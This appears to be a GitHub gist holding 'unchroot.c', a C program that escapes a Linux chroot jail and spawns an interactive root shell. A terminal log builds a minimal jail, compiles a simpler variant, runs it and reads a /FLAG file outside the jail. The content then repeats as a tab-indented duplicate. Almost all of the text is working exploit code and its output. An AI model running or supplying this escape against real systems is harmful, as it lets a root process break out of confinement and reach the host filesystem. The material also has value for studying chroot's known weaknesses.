gauravssnl/unchroot.c

## unchroot.c
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");
    return execl("/bin/sh", "-i", NULL);
}

## unchroot.txt
$ echo 1337 | sudo tee /FLAG
1337
$ mkdir chroot
$ cd chroot/
$ mkdir bin etc lib var home
$ ln -s lib lib64
$ ldd /bin/sh
    linux-vdso.so.1 =>  (0x00007fffa9c83000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a29106000)
    /lib64/ld-linux-x86-64.so.2 (0x00007f9a294d8000)
$ cp /bin/sh bin
$ cp /lib/x86_64-linux-gnu/libc.so.6 lib
$ cp /lib64/ld-linux-x86-64.so.2 lib
$ tree
.
├── bin
│   └── sh
├── etc
├── home
├── lib
│   ├── ld-linux-x86-64.so.2
│   └── libc.so.6
├── lib64 -> lib
└── var

6 directories, 3 files
$
$ cat > unchroot.c
#include <sys/stat.h>
#include <unistd.h>

int main() {
    mkdir(".42", 0755);
    chroot(".42");
    chroot("../../../../../../../../../../../../../../../..");
    return execl("/bin/sh", "-i", NULL);
}
$ gcc -static -o unchroot unchroot.c
$
$ sudo chroot . /bin/sh
# ls
/bin/sh: 1: ls: not found
# ./unchroot
# ls
bin    dev   home            lib         media  proc  sbin     sys  var
boot   etc   initrd.img      lib64       mnt    root  selinux  tmp  vmlinuz
cdrom  FLAG  initrd.img.old  lost+found  opt    run   srv      usr  vmlinuz.old
# cat FLAG
1337
#
	#include <sys/stat.h>
	#include <unistd.h>
	#include <fcntl.h>

	int main() {
	int dir_fd, x;
	setuid(0);
	mkdir(".42", 0755);
	dir_fd = open(".", O_RDONLY);
	chroot(".42");
	fchdir(dir_fd);
	close(dir_fd);
	for(x = 0; x < 1000; x++) chdir("..");
	chroot(".");
	return execl("/bin/sh", "-i", NULL);
	}
	$ echo 1337 \| sudo tee /FLAG
	1337
	$ mkdir chroot
	$ cd chroot/
	$ mkdir bin etc lib var home
	$ ln -s lib lib64
	$ ldd /bin/sh
	linux-vdso.so.1 => (0x00007fffa9c83000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a29106000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f9a294d8000)
	$ cp /bin/sh bin
	$ cp /lib/x86_64-linux-gnu/libc.so.6 lib
	$ cp /lib64/ld-linux-x86-64.so.2 lib
	$ tree
	.
	├── bin
	│ └── sh
	├── etc
	├── home
	├── lib
	│ ├── ld-linux-x86-64.so.2
	│ └── libc.so.6
	├── lib64 -> lib
	└── var

	6 directories, 3 files
	$
	$ cat > unchroot.c
	#include <sys/stat.h>
	#include <unistd.h>

	int main() {
	mkdir(".42", 0755);
	chroot(".42");
	chroot("../../../../../../../../../../../../../../../..");
	return execl("/bin/sh", "-i", NULL);
	}
	$ gcc -static -o unchroot unchroot.c
	$
	$ sudo chroot . /bin/sh
	# ls
	/bin/sh: 1: ls: not found
	# ./unchroot
	# ls
	bin dev home lib media proc sbin sys var
	boot etc initrd.img lib64 mnt root selinux tmp vmlinuz
	cdrom FLAG initrd.img.old lost+found opt run srv usr vmlinuz.old
	# cat FLAG
	1337
	#